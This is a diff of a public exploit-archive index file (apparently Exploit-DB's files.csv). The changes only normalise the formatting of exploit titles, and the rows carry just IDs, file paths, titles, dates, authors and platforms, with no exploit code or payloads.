20468,platforms/multiple/remote/20468.txt,"Inktomi Search Software 3.0 Information Disclosure",2000-12-05,"china nsl",multiple,remote,0 20469,platforms/unix/remote/20469.txt,"Endymion MailMan 3.0.x - Remote Arbitrary Command Execution",2000-12-06,"Secure Reality Advisories",unix,remote,0 20470,platforms/windows/dos/20470.txt,"IBM DB2 - Universal Database for Windows NT 6.1/7.1 SQL DoS",2000-12-05,benjurry,windows,dos,0 -21316,platforms/php/webapps/21316.txt,"ASTPP VoIP Billing (4cf207a) Multiple Vulnerabilities",2012-09-14,Vulnerability-Lab,php,webapps,0 +21316,platforms/php/webapps/21316.txt,"ASTPP VoIP Billing (4cf207a) - Multiple Vulnerabilities",2012-09-14,Vulnerability-Lab,php,webapps,0 20472,platforms/multiple/remote/20472.txt,"IBM DB2 - Universal Database for Linux 6.1/Windows NT 6.1 Known Default Password",2000-12-05,benjurry,multiple,remote,0 20473,platforms/hardware/dos/20473.pl,"Cisco Catalyst 4000 4.x/5.x_Catalyst 5000 4.5/5.x_Catalyst 6000 5.x Memory Leak DoS",2000-12-06,blackangels,hardware,dos,0 20474,platforms/php/webapps/20474.txt,"WordPress RSVPMaker 2.5.4 - Persistent XSS",2012-08-13,"Chris Kellum",php,webapps,0 @@ -18135,9 +18135,9 @@ id,file,description,date,author,platform,type,port 20828,platforms/windows/dos/20828.txt,"SpyNet 6.5 Chat Server Multiple Connection Denial of Service",2001-05-07,nemesystm,windows,dos,0 20829,platforms/windows/remote/20829.txt,"T. Hauck Jana Server 1.45/1.46 Hex Encoded Directory Traversal",2001-05-07,neme-dhc,windows,remote,0 20830,platforms/windows/dos/20830.txt,"T. Hauck Jana Server 1.45/1.46/2.0 - MS-DOS Device Name DoS",2001-05-07,neme-dhc,windows,dos,0 -20831,platforms/cgi/remote/20831.txt,"Drummond Miles A1Stats 1.0 a1disp2.cgi Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote,0 -20832,platforms/cgi/remote/20832.txt,"Drummond Miles A1Stats 1.0 a1disp3.cgi Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote,0 -20833,platforms/cgi/remote/20833.txt,"Drummond Miles A1Stats 1.0 a1disp4.cgi Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote,0 +20831,platforms/cgi/remote/20831.txt,"Drummond Miles A1Stats 1.0 - a1disp2.cgi Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote,0 +20832,platforms/cgi/remote/20832.txt,"Drummond Miles A1Stats 1.0 - a1disp3.cgi Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote,0 +20833,platforms/cgi/remote/20833.txt,"Drummond Miles A1Stats 1.0 - a1disp4.cgi Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote,0 20834,platforms/windows/dos/20834.txt,"ElectroSoft ElectroComm 1.0/2.0 - Denial of Service",2001-05-07,nemesystm,windows,dos,0 20835,platforms/windows/remote/20835.c,"Microsoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (1)",2001-05-15,"Filip Maertens",windows,remote,0 20836,platforms/windows/remote/20836.c,"Microsoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (2)",2001-05-16,HuXfLuX,windows,remote,0 @@ -19180,7 +19180,7 @@ id,file,description,date,author,platform,type,port 21912,platforms/php/webapps/21912.txt,"Killer Protection 1.0 Information Disclosure",2002-10-07,frog,php,webapps,0 21913,platforms/windows/remote/21913.txt,"Citrix Published Applications - Information Disclosure",2002-10-07,wire,windows,remote,0 21914,platforms/asp/webapps/21914.txt,"SSGBook 1.0 Image Tag HTML Injection Vulnerabilities",2002-10-08,frog,asp,webapps,0 -21915,platforms/windows/dos/21915.txt,"Symantec Norton Personal Firewall 2002/ Kaspersky Labs Anti-Hacker 1.0/BlackIce Server Protection 3.5/BlackICE Defender 2.9 - Auto Block DoS Weakness",2002-10-08,"Yiming Gong",windows,dos,0 +21915,platforms/windows/dos/21915.txt,"Symantec Norton Personal Firewall 2002/Kaspersky Labs Anti-Hacker 1.0/BlackIce Server Protection 3.5/BlackICE Defender 2.9 - Auto Block DoS Weakness",2002-10-08,"Yiming Gong",windows,dos,0 33403,platforms/windows/dos/33403.py,"Intellicom 1.3 - 'NetBiterConfig.exe' 'Hostname' Data Remote Stack Buffer Overflow",2009-12-14,"Ruben Santamarta ",windows,dos,0 21918,platforms/php/webapps/21918.html,"VBZoom 1.0 - Remote SQL Injection",2002-10-08,hish,php,webapps,0 21919,platforms/unix/remote/21919.sh,"Sendmail 8.12.6 Trojan Horse",2002-10-08,netmask,unix,remote,0 @@ -19302,7 +19302,7 @@ id,file,description,date,author,platform,type,port 22038,platforms/php/webapps/22038.txt,"Sisfokol 4.0 - Arbitrary File Upload",2012-10-17,"cr4wl3r ",php,webapps,0 22039,platforms/php/webapps/22039.txt,"symphony CMS 2.3 - Multiple Vulnerabilities",2012-10-17,Wireghoul,php,webapps,0 22040,platforms/jsp/webapps/22040.txt,"ManageEngine Support Center Plus <= 7908 - Multiple Vulnerabilities",2012-10-17,xistence,jsp,webapps,0 -22041,platforms/multiple/webapps/22041.txt,"Oracle WebCenter Sites (FatWire Content Server) Multiple Vulnerabilities",2012-10-17,"SEC Consult",multiple,webapps,0 +22041,platforms/multiple/webapps/22041.txt,"Oracle WebCenter Sites (FatWire Content Server) - Multiple Vulnerabilities",2012-10-17,"SEC Consult",multiple,webapps,0 22042,platforms/php/webapps/22042.php,"VBulletin 2.0.x/2.2.x members2.php Cross-Site Scripting",2002-11-25,Sp.IC,php,webapps,0 22043,platforms/php/webapps/22043.txt,"phpBB 2.0.3 Script Injection",2002-11-25,"Pete Foster",php,webapps,0 22044,platforms/php/webapps/22044.txt,"Web Server Creator Web Portal 0.1 - Remote File Include",2002-11-25,frog,php,webapps,0 @@ -20119,7 +20119,7 @@ id,file,description,date,author,platform,type,port 22877,platforms/php/webapps/22877.txt,"Yii Framework 1.1.8 - Search SQL Injection",2012-11-21,Juno_okyo,php,webapps,0 22878,platforms/windows/dos/22878.txt,"Adobe Reader 10.1.4 JP2KLib&CoolType Crash PoC",2012-11-21,coolkaveh,windows,dos,0 22879,platforms/windows/webapps/22879.txt,"ManageEngine ServiceDesk 8.0 - Multiple Vulnerabilities",2012-11-21,Vulnerability-Lab,windows,webapps,0 -23034,platforms/windows/remote/23034.txt,"Microsoft URLScan 2.5/ RSA Security SecurID 5.0 Configuration Enumeration Weakness",2003-08-14,"Andy Davis",windows,remote,0 +23034,platforms/windows/remote/23034.txt,"Microsoft URLScan 2.5/RSA Security SecurID 5.0 - Configuration Enumeration Weakness",2003-08-14,"Andy Davis",windows,remote,0 23035,platforms/asp/webapps/23035.txt,"Poster 2.0 - Unauthorized Privileged User Access",2003-08-15,DarkKnight,asp,webapps,0 23036,platforms/php/webapps/23036.txt,"MatrikzGB Guestbook 2.0 - Administrative Privilege Escalation",2003-08-16,"Stephan Sattler",php,webapps,0 23037,platforms/windows/local/23037.txt,"DWebPro 3.4.1 Http.ini Plaintext Password Storage",2003-08-18,rUgg1n3,windows,local,0 @@ -20467,7 +20467,7 @@ id,file,description,date,author,platform,type,port 23239,platforms/linux/dos/23239.c,"IRCnet IRCD 2.10 - Local Buffer Overflow",2003-10-13,millhouse,linux,dos,0 23240,platforms/windows/dos/23240.pl,"mIRC 6.1 DCC SEND Buffer Overflow (1)",2003-10-13,"Takara Takaishi",windows,dos,0 23241,platforms/windows/dos/23241.pl,"mIRC 6.1 DCC SEND Buffer Overflow (2)",2003-10-13,DarkAngel,windows,dos,0 -23242,platforms/windows/dos/23242.pl,"WinSyslog Interactive Syslog Server 4.21/ long Message Remote Denial of Service",2003-10-14,storm@securiteam.com,windows,dos,0 +23242,platforms/windows/dos/23242.pl,"WinSyslog Interactive Syslog Server 4.21 - long Message Remote Denial of Service",2003-10-14,storm@securiteam.com,windows,dos,0 23243,platforms/windows/remote/23243.py,"Free Float FTP Server USER Command Buffer Overflow",2012-12-09,D35m0nd142,windows,remote,0 23244,platforms/php/webapps/23244.txt,"WrenSoft Zoom Search Engine 2.0 Build: 1018 - Cross-Site Scripting",2003-10-14,Ezhilan,php,webapps,0 23245,platforms/linux/dos/23245.pl,"Apache Tomcat 4.0.x - Non-HTTP Request Denial of Service",2003-10-15,"Oliver Karow",linux,dos,0 @@ -21332,7 +21332,7 @@ id,file,description,date,author,platform,type,port 24140,platforms/hardware/remote/24140.txt,"Netgear RP114 3.26 Content Filter Bypass",2004-05-24,"Marc Ruef",hardware,remote,0 24141,platforms/linux/local/24141.txt,"cPanel 5-9 - Local Privilege Escalation",2004-05-24,"Rob Brown",linux,local,0 24142,platforms/windows/dos/24142.pl,"MollenSoft Lightweight FTP Server 3.6 - Remote Denial of Service",2004-05-24,storm,windows,dos,0 -24143,platforms/hardware/dos/24143.c,"VocalTec VGW120/ VGW480 Telephony Gateway Remote H.225 - Denial of Service",2004-05-24,Alexander,hardware,dos,0 +24143,platforms/hardware/dos/24143.c,"VocalTec VGW120/VGW480 Telephony Gateway Remote H.225 - Denial of Service",2004-05-24,Alexander,hardware,dos,0 24144,platforms/windows/dos/24144.txt,"MiniShare Server 1.3.2 - Remote Denial of Service",2004-05-26,"Donato Ferrante",windows,dos,0 24145,platforms/windows/dos/24145.c,"Orenosv HTTP/FTP Server 0.5.9 HTTP GET Denial of Service (1)",2004-05-25,badpack3t,windows,dos,0 24146,platforms/windows/dos/24146.bat,"Orenosv HTTP/FTP Server 0.5.9 HTTP GET Denial of Service (2)",2004-06-02,CoolICE,windows,dos,0 @@ -24107,7 +24107,7 @@ id,file,description,date,author,platform,type,port 26988,platforms/php/webapps/26988.txt,"Koobi 5.0 BBCode URL Tag Script Injection",2005-12-28,"kurdish hackers team",php,webapps,0 26989,platforms/php/webapps/26989.txt,"GMailSite 1.0.x - Cross-Site Scripting",2005-12-29,Lostmon,php,webapps,0 26990,platforms/php/webapps/26990.txt,"MyBB 1.0 Globa.php Cookie Data SQL Injection",2005-12-29,imei,php,webapps,0 -26991,platforms/asp/webapps/26991.html,"Web Wiz Multiple Products SQL Injection",2005-12-30,DevilBox,asp,webapps,0 +26991,platforms/asp/webapps/26991.html,"Web Wiz Multiple Products - SQL Injection",2005-12-30,DevilBox,asp,webapps,0 26992,platforms/php/webapps/26992.txt,"Ades Design AdesGuestbook 2.0 Read Script Cross-Site Scripting",2005-12-30,r0t3d3Vil,php,webapps,0 26993,platforms/php/webapps/26993.txt,"OOApp Guestbook 2.1 Home Script Cross-Site Scripting",2005-12-30,r0t3d3Vil,php,webapps,0 26994,platforms/php/webapps/26994.txt,"Kayako SupportSuite 3.0 0.26 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-30,r0t3d3Vil,php,webapps,0 @@ -24565,7 +24565,7 @@ id,file,description,date,author,platform,type,port 27457,platforms/cfm/webapps/27457.txt,"1WebCalendar 4.0 - mainCal.cfm SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0 27458,platforms/php/webapps/27458.txt,"EasyMoblog 0.5 Img.php Cross-Site Scripting",2006-03-23,FarhadKey,php,webapps,0 27459,platforms/php/webapps/27459.txt,"CoMoblog 1.0 Img.php Cross-Site Scripting",2006-03-23,FarhadKey,php,webapps,0 -27460,platforms/multiple/dos/27460.pl,"RealNetworks Multiple Products Multiple Buffer Overflow Vulnerabilities",2006-03-23,"Federico L. Bossi Bonin",multiple,dos,0 +27460,platforms/multiple/dos/27460.pl,"RealNetworks Multiple Products - Multiple Buffer Overflow Vulnerabilities",2006-03-23,"Federico L. Bossi Bonin",multiple,dos,0 27461,platforms/linux/local/27461.c,"Linux Kernel 2.4.x/2.5.x/2.6.x - Sockaddr_In.Sin_Zero Kernel Memory Disclosure Vulnerabilities",2006-03-23,"Pavel Kankovsky",linux,local,0 27462,platforms/php/webapps/27462.txt,"AdMan 1.0.20051221 ViewStatement.php SQL Injection",2003-03-23,r0t,php,webapps,0 27463,platforms/jsp/webapps/27463.txt,"IBM Tivoli Business Systems Manager 3.1 APWC_Win_Main.JSP Cross-Site Scripting",2006-03-23,anonymous,jsp,webapps,0 @@ -25306,7 +25306,7 @@ id,file,description,date,author,platform,type,port 28247,platforms/php/webapps/28247.txt,"IDevSpot PHPLinkExchange 1.0 Index.php Remote File Include",2006-07-20,r0t,php,webapps,0 28248,platforms/php/webapps/28248.txt,"IDevSpot PHPHostBot 1.0 Index.php Remote File Include",2006-07-20,r0t,php,webapps,0 28249,platforms/php/webapps/28249.txt,"GeoAuctions 1.0.6 Enterprise index.php d Parameter SQL Injection",2006-07-20,LBDT,php,webapps,0 -28250,platforms/php/webapps/28250.txt,"Geodesic Solutions Multiple Products index.php b Parameter SQL Injection",2006-07-20,LBDT,php,webapps,0 +28250,platforms/php/webapps/28250.txt,"Geodesic Solutions Multiple Products - index.php b Parameter SQL Injection",2006-07-20,LBDT,php,webapps,0 28251,platforms/php/webapps/28251.txt,"MiniBB 1.5 News.php Remote File Include",2006-07-20,AG-Spider,php,webapps,0 28252,platforms/windows/dos/28252.txt,"Microsoft Internet Explorer 6.0 String To Binary Function Denial of Service",2006-07-20,hdm,windows,dos,0 28253,platforms/php/webapps/28253.txt,"Advanced Poll 2.0.2 Common.Inc.php Remote File Include",2006-07-21,Solpot,php,webapps,0 @@ -25389,7 +25389,7 @@ id,file,description,date,author,platform,type,port 28333,platforms/unix/remote/28333.rb,"D-Link Devices UPnP SOAP Telnetd Command Execution",2013-09-17,Metasploit,unix,remote,49152 28334,platforms/linux/remote/28334.rb,"Sophos Web Protection Appliance sblistpack Arbitrary Command Execution",2013-09-17,Metasploit,linux,remote,443 28335,platforms/windows/local/28335.rb,"Agnitum Outpost Internet Security Local Privilege Escalation",2013-09-17,Metasploit,windows,local,0 -28336,platforms/windows/remote/28336.rb,"HP ProCurve Manager SNAC UpdateDomainControllerServlet File Upload",2013-09-17,Metasploit,windows,remote,443 +28336,platforms/windows/remote/28336.rb,"HP ProCurve Manager - SNAC UpdateDomainControllerServlet File Upload",2013-09-17,Metasploit,windows,remote,443 28337,platforms/windows/remote/28337.rb,"HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload",2013-09-17,Metasploit,windows,remote,443 28338,platforms/linux/dos/28338.txt,"Vino VNC Server 3.7.3 - Persistent Denial of Service",2013-09-17,"Trustwave's SpiderLabs",linux,dos,5900 28339,platforms/asp/webapps/28339.txt,"Anychart 3.0 Password Parameter SQL Injection",2006-08-03,sCORPINo,asp,webapps,0 @@ -25411,7 +25411,7 @@ id,file,description,date,author,platform,type,port 28355,platforms/php/webapps/28355.txt,"VWar 1.5 news.php vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 28356,platforms/php/webapps/28356.txt,"VWar 1.5 stats.php vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 28357,platforms/windows/remote/28357.asc,"Microsoft Windows Explorer 2000/2003/XP Drag and Drop Remote Code Execution",2006-07-27,"Plebo Aesdi Nael",windows,remote,0 -28358,platforms/linux/dos/28358.txt,"Linux Kernel 2.6.x (<= 2.6.17.7) - NFS and EXT3 Combination Remote Denial of Service",2006-08-07,"James McKenzie",linux,dos,0 +28358,platforms/linux/dos/28358.txt,"Linux Kernel <= 2.6.17.7 - NFS and EXT3 Combination Remote Denial of Service",2006-08-07,"James McKenzie",linux,dos,0 28359,platforms/php/webapps/28359.txt,"PHPPrintAnalyzer 1.1 Index.php Remote File Include",2006-08-07,sh3ll,php,webapps,0 28360,platforms/windows/remote/28360.c,"EasyCafe 2.1/2.2 Security Restriction Bypass",2006-08-07,"Mobin Yazarlou",windows,remote,0 28361,platforms/multiple/dos/28361.c,"Festalon 0.5 HES Files Remote Heap Buffer Overflow",2006-08-07,"Luigi Auriemma",multiple,dos,0 @@ -25475,7 +25475,7 @@ id,file,description,date,author,platform,type,port 28421,platforms/windows/dos/28421.htm,"Microsoft Internet Explorer 6.0 - Multiple COM Object Color Property Denial of Service Vulnerabilities",2006-08-21,XSec,windows,dos,0 28422,platforms/php/webapps/28422.txt,"DieselScripts Diesel Paid Mail Getad.php Cross-Site Scripting",2006-08-21,night_warrior771,php,webapps,0 28423,platforms/php/webapps/28423.txt,"RedBlog 0.5 Index.php Remote File Include",2006-08-22,Root3r_H3ll,php,webapps,0 -28424,platforms/linux/remote/28424.txt,"Apache HTTP Server (<= 1.3.35 / <= 2.0.58 / <= 2.2.2) - Arbitrary HTTP Request Headers Security Weakness",2006-08-24,"Thiago Zaninotti",linux,remote,0 +28424,platforms/linux/remote/28424.txt,"Apache HTTP Server <= 1.3.35 / <= 2.0.58 / <= 2.2.2 - Arbitrary HTTP Request Headers Security Weakness",2006-08-24,"Thiago Zaninotti",linux,remote,0 28425,platforms/solaris/local/28425.txt,"Sun Solaris 8/9 UCB/PS Command Local Information Disclosure",2006-03-27,anonymous,solaris,local,0 28426,platforms/php/webapps/28426.txt,"Headline Portal Engine 0.x/1.0 HPEInc Parameter Multiple Remote File Include Vulnerabilities",2006-08-21,"the master",php,webapps,0 28427,platforms/novell/local/28427.pl,"Novell Identity Manager Arbitrary Command Execution",2006-08-18,anonymous,novell,local,0 @@ -25635,7 +25635,7 @@ id,file,description,date,author,platform,type,port 28585,platforms/php/webapps/28585.txt,"Jupiter CMS 1.1.4/1.1.5 modules/search.php Multiple Parameter XSS",2006-09-15,"HACKERS PAL",php,webapps,0 28586,platforms/php/webapps/28586.txt,"Jupiter CMS 1.1.4/1.1.5 modules/register Multiple Parameter SQL Injection",2006-09-15,"HACKERS PAL",php,webapps,0 28587,platforms/asp/webapps/28587.txt,"EasyPage 7 Default.ASPX SQL Injection",2006-09-15,s3rv3r_hack3r,asp,webapps,0 -28588,platforms/windows/dos/28588.txt,"Symantec Multiple Products SymEvent Driver Local Denial of Service",2006-09-15,"David Matousek",windows,dos,0 +28588,platforms/windows/dos/28588.txt,"Symantec Multiple Products - SymEvent Driver Local Denial of Service",2006-09-15,"David Matousek",windows,dos,0 28589,platforms/asp/webapps/28589.txt,"Web Wiz Forums 7.01 Members.ASP Cross-Site Scripting",2006-09-15,Crack_MaN,asp,webapps,0 28590,platforms/php/webapps/28590.txt,"Hitweb 3.0 REP_CLASS Multiple Remote File Include Vulnerabilities",2006-09-16,ERNE,php,webapps,0 28591,platforms/php/webapps/28591.php,"PHP-post Web Forum 0.x.1.0 profile.php Multiple Parameter SQL Injection",2006-09-16,"HACKERS PAL",php,webapps,0 @@ -25695,7 +25695,7 @@ id,file,description,date,author,platform,type,port 28645,platforms/php/webapps/28645.txt,"CakePHP 1.1.7.3363 Vendors.php Directory Traversal",2006-09-22,"James Bercegay",php,webapps,0 28646,platforms/php/webapps/28646.txt,"mysource 2.14.8/2.16 - Multiple Vulnerabilities",2006-09-22,"Patrick Webster",php,webapps,0 28647,platforms/php/webapps/28647.txt,"PLESK 7.5/7.6 - Filemanager.php Directory Traversal",2006-09-22,GuanYu,php,webapps,0 -28648,platforms/freebsd/dos/28648.c,"FreeBSD 5.x I386_Set_LDT() Multiple Local Denial of Service Vulnerabilities",2006-09-23,"Adriano Lima",freebsd,dos,0 +28648,platforms/freebsd/dos/28648.c,"FreeBSD 5.x I386_Set_LDT() - Multiple Local Denial of Service Vulnerabilities",2006-09-23,"Adriano Lima",freebsd,dos,0 28649,platforms/hardware/webapps/28649.txt,"Tenda W309R Router 5.07.46 - Configuration Disclosure",2013-09-30,SANTHO,hardware,webapps,0 28650,platforms/windows/dos/28650.py,"KMPlayer 3.7.0.109 - (.wav) Crash PoC",2013-09-30,xboz,windows,dos,0 28695,platforms/php/webapps/28695.txt,"CubeCart 3.0.x admin/forgot_pass.php user_name Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 @@ -26294,7 +26294,7 @@ id,file,description,date,author,platform,type,port 29287,platforms/windows/dos/29287.txt,"Multiple Vendor Firewall HIPS Process Spoofing",2006-12-15,"Matousec Transparent security",windows,dos,0 29288,platforms/asp/webapps/29288.txt,"Omniture SiteCatalyst Multiple Cross-Site Scripting Vulnerabilities",2006-12-16,"Hackers Center Security",asp,webapps,0 29289,platforms/php/webapps/29289.php,"eXtreme-fusion 4.02 Fusion_Forum_View.php Local File Include",2006-12-16,Kacper,php,webapps,0 -29290,platforms/php/remote/29290.c,"Apache + PHP 5.x (< 5.3.12 & < 5.4.2) - cgi-bin Remote Code Execution Exploit",2013-10-29,kingcope,php,remote,80 +29290,platforms/php/remote/29290.c,"Apache + PHP < 5.3.12 & < 5.4.2 - cgi-bin Remote Code Execution Exploit",2013-10-29,kingcope,php,remote,80 29293,platforms/asp/webapps/29293.txt,"Contra Haber Sistemi 1.0 Haber.ASP SQL Injection",2006-12-16,ShaFuck31,asp,webapps,0 29294,platforms/php/webapps/29294.html,"Knusperleicht Shoutbox 2.6 Shout.php HTML Injection",2006-12-18,IMHOT3B,php,webapps,0 29295,platforms/windows/dos/29295.html,"Microsoft Outlook ActiveX Control Remote Internet Explorer Denial of Service",2006-12-18,shinnai,windows,dos,0 @@ -26318,7 +26318,7 @@ id,file,description,date,author,platform,type,port 29312,platforms/hardware/webapps/29312.txt,"Unicorn Router WB-3300NR CSRF (Factory Reset/DNS Change)",2013-10-30,absane,hardware,webapps,0 29313,platforms/php/webapps/29313.txt,"Xt-News 0.1 show_news.php id_news Parameter XSS",2006-12-22,Mr_KaLiMaN,php,webapps,0 29314,platforms/php/webapps/29314.txt,"Xt-News 0.1 show_news.php id_news Parameter SQL Injection",2006-12-22,Mr_KaLiMaN,php,webapps,0 -29316,platforms/php/remote/29316.py,"Apache + PHP 5.x (< 5.3.12 & < 5.4.2) - Remote Code Execution (Multithreaded Scanner)",2013-10-31,noptrix,php,remote,0 +29316,platforms/php/remote/29316.py,"Apache + PHP < 5.3.12 & < 5.4.2 - Remote Code Execution (Multithreaded Scanner)",2013-10-31,noptrix,php,remote,0 29994,platforms/php/webapps/29994.txt,"Campsite 2.6.1 - Template.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29995,platforms/php/webapps/29995.txt,"Campsite 2.6.1 - TimeUnit.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29318,platforms/php/webapps/29318.txt,"ImpressPages CMS 3.6 - Multiple XSS/SQLi Vulnerabilities",2013-10-31,LiquidWorm,php,webapps,0 @@ -26539,7 +26539,7 @@ id,file,description,date,author,platform,type,port 30019,platforms/windows/remote/30019.c,"CA Multiple Products Console Server and InoCore.dll - Remote Code Execution Vulnerabilities",2007-05-09,binagres,windows,remote,0 30020,platforms/linux/dos/30020.txt,"MySQL 5.0.x - IF Query Handling Remote Denial of Service",2013-12-04,"Neil Kettle",linux,dos,0 30021,platforms/solaris/local/30021.txt,"Sun Microsystems Solaris SRSEXEC 3.2.x - Arbitrary File Read Local Information Disclosure",2007-05-10,anonymous,solaris,local,0 -30022,platforms/php/webapps/30022.txt,"PHP Multi User Randomizer 2006.09.13 Configure_Plugin.TPL.php Cross-Site Scripting",2007-05-10,the_Edit0r,php,webapps,0 +30022,platforms/php/webapps/30022.txt,"PHP Multi User Randomizer 2006.09.13 - Configure_Plugin.TPL.php Cross-Site Scripting",2007-05-10,the_Edit0r,php,webapps,0 30023,platforms/windows/dos/30023.txt,"Progress OpenEdge 10 b - Multiple Denial of Service Vulnerabilities",2007-05-11,"Eelko Neven",windows,dos,0 30024,platforms/linux/dos/30024.txt,"LibEXIF 0.6.x - Exif_Data_Load_Data_Entry Remote Integer Overflow",2007-05-11,"Victor Stinner",linux,dos,0 30025,platforms/multiple/remote/30025.txt,"TeamSpeak Server 2.0.23 - Multiple Scripts Multiple Cross-Site Scripting Vulnerabilities",2007-05-11,"Gilberto Ficara",multiple,remote,0 @@ -26910,7 +26910,7 @@ id,file,description,date,author,platform,type,port 29807,platforms/php/remote/29807.php,"PHP <= 5.1.6 Imap_Mail_Compose() Function Buffer Overflow",2007-03-31,"Stefan Esser",php,remote,0 29808,platforms/php/remote/29808.php,"PHP <= 5.1.6 - Msg_Receive() Memory Allocation Integer Overflow",2007-03-31,"Stefan Esser",php,remote,0 29809,platforms/linux/dos/29809.txt,"PulseAudio 0.9.5 Assert() Remote Denial of Service",2007-04-02,"Luigi Auriemma",linux,dos,0 -29810,platforms/windows/dos/29810.c,"Symantec Multiple Products SPBBCDrv Driver Local Denial of Service",2007-04-01,"David Matousek",windows,dos,0 +29810,platforms/windows/dos/29810.c,"Symantec Multiple Products - SPBBCDrv Driver Local Denial of Service",2007-04-01,"David Matousek",windows,dos,0 29813,platforms/windows/dos/29813.py,"Microsoft Windows Vista ARP Table Entries Denial of Service",2004-04-02,"Kristian Hermansen",windows,dos,0 29814,platforms/windows/remote/29814.txt,"NextPage LivePublish 2.02 LPEXT.DLL Cross-Site Scripting",2007-04-03,"Igor Monteiro Vieira",windows,remote,0 29815,platforms/hardware/remote/29815.rb,"NETGEAR ReadyNAS Perl Code Evaluation",2013-11-25,Metasploit,hardware,remote,443 @@ -26966,9 +26966,9 @@ id,file,description,date,author,platform,type,port 29867,platforms/windows/dos/29867.xml,"NetSprint Ask IE Toolbar 1.1 - Multiple Denial of Service Vulnerabilities",2007-04-17,"Michal Bucko",windows,dos,0 29868,platforms/php/webapps/29868.txt,"NuclearBB Alpha 1 - Multiple SQL Injection Vulnerabilities",2007-04-18,"John Martinelli",php,webapps,0 29869,platforms/php/webapps/29869.php,"Fully Modded PHPBB2 PHPBB_Root_Path Remote File Include",2007-04-19,"HACKERS PAL",php,webapps,0 -29870,platforms/php/webapps/29870.txt,"Exponent CMS 0.96.5/ 0.96.6 magpie_debug.php url Parameter XSS",2007-04-20,"Hamid Ebadi",php,webapps,0 -29871,platforms/php/webapps/29871.txt,"Exponent CMS 0.96.5/ 0.96.6 magpie_slashbox.php rss_url Parameter XSS",2007-04-20,"Hamid Ebadi",php,webapps,0 -29872,platforms/php/webapps/29872.txt,"Exponent CMS 0.96.5/ 0.96.6 iconspopup.php icodir Variable Traversal Arbitrary Directory Listing",2007-04-20,"Hamid Ebadi",php,webapps,0 +29870,platforms/php/webapps/29870.txt,"Exponent CMS 0.96.5/0.96.6 - magpie_debug.php url Parameter XSS",2007-04-20,"Hamid Ebadi",php,webapps,0 +29871,platforms/php/webapps/29871.txt,"Exponent CMS 0.96.5/0.96.6 - magpie_slashbox.php rss_url Parameter XSS",2007-04-20,"Hamid Ebadi",php,webapps,0 +29872,platforms/php/webapps/29872.txt,"Exponent CMS 0.96.5/0.96.6 - iconspopup.php icodir Variable Traversal Arbitrary Directory Listing",2007-04-20,"Hamid Ebadi",php,webapps,0 29873,platforms/multiple/remote/29873.php,"FreePBX 2.2 - SIP Packet Multiple HTML Injection Vulnerabilities",2007-04-20,XenoMuta,multiple,remote,0 29874,platforms/php/webapps/29874.txt,"PHP Turbulence 0.0.1 Turbulence.php Remote File Include",2007-04-20,Omni,php,webapps,0 29875,platforms/multiple/dos/29875.py,"AMSN 0.96 - Malformed Message Denial of Service",2007-04-21,"Levent Kayan",multiple,dos,0 @@ -27980,7 +27980,7 @@ id,file,description,date,author,platform,type,port 31095,platforms/novell/remote/31095.txt,"Novell GroupWise 5.57e/6.5.7/7.0 WebAccess Multiple Cross-Site Scripting Vulnerabilities",2008-01-31,"Frederic Loudet",novell,remote,0 31096,platforms/php/webapps/31096.txt,"WordPress Plugin ShiftThis Newsletter - SQL Injection",2008-02-03,S@BUN,php,webapps,0 31097,platforms/php/webapps/31097.txt,"CruxCMS 3.0 - 'search.php' Cross-Site Scripting",2008-02-04,Psiczn,php,webapps,0 -31098,platforms/php/webapps/31098.txt,"Simple OS CMS 0.1c_beta 'login.php' SQL Injection",2008-02-04,Psiczn,php,webapps,0 +31098,platforms/php/webapps/31098.txt,"Simple OS CMS 0.1c_beta - 'login.php' SQL Injection",2008-02-04,Psiczn,php,webapps,0 31099,platforms/php/webapps/31099.txt,"Codice CMS 'login.php' SQL Injection",2008-02-04,Psiczn,php,webapps,0 31100,platforms/multiple/dos/31100.txt,"Anon Proxy Server 0.100/0.102 - Remote Authentication Buffer Overflow",2008-02-04,L4teral,multiple,dos,0 31101,platforms/php/webapps/31101.txt,"HispaH Youtube Clone 'load_message.php' Cross-Site Scripting",2008-02-04,Smasher,php,webapps,0 @@ -28128,8 +28128,8 @@ id,file,description,date,author,platform,type,port 31230,platforms/php/webapps/31230.txt,"WordPress wp-people Plugin 2.0 - 'wp-people-popup.php' SQL Injection",2008-02-18,S@BUN,php,webapps,0 31231,platforms/windows/remote/31231.txt,"SIMM-Comm SCI Photo Chat 3.4.9 - Directory Traversal",2008-02-19,"Luigi Auriemma",windows,remote,0 31232,platforms/multiple/dos/31232.txt,"Foxit WAC Remote Access Server 2.0 Build 3503 - Heap Buffer Overflow",2008-02-16,"Luigi Auriemma",multiple,dos,0 -31233,platforms/multiple/webapps/31233.txt,"WebcamXP 3.72.440/4.05.280 beta /pocketpc camnum Variable Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",multiple,webapps,0 -31234,platforms/multiple/webapps/31234.txt,"WebcamXP 3.72.440/4.05.280 beta /show_gallery_pic id Variable Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",multiple,webapps,0 +31233,platforms/multiple/webapps/31233.txt,"WebcamXP 3.72.440/4.05.280 beta - /pocketpc camnum Variable Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",multiple,webapps,0 +31234,platforms/multiple/webapps/31234.txt,"WebcamXP 3.72.440/4.05.280 beta - /show_gallery_pic id Variable Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",multiple,webapps,0 31235,platforms/php/webapps/31235.txt,"Jinzora 2.7.5 index.php Multiple Parameter XSS",2008-02-19,"Alexandr 